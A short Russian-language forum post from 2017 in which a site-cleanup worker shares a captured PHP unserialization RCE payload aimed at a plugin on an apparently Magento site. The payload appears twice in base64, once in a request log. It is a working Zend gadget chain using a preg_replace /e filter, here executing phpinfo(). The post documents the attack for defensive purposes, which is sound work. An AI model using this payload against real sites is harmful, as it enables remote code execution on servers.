21.08.2017, 13:45
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
В меру лечения сайтов от вирусов и их безопасности, при снифинге запросов, был выявлен следующий shellcod RCE через унсериализацию данных в плагине:
в кодеровке base64:
Сообщение от None
YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb2 4iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntz OjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF 9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNU b01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dE V2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5 OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOj ExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3Rv ciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3 M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7 czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjk6InBocGluZm8oKS I7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czox MDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKg Bfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=
Пример лога:
Сообщение от None
/*START_LOG*/ 141.101.[HIDEN] | POST | mage.[HIDEN].com/[HIDEN]/ | Mozilla/5.0 ([HIDEN])
--
POST[] id=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHR pb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxO ntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmV uZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVud HNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW9 1dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7T zo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0Ijt POjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY 3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI 6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZ SI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjk6InBocGluZm8 oKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7c zoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiI AKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=
/*END_LOG*/
|
|
|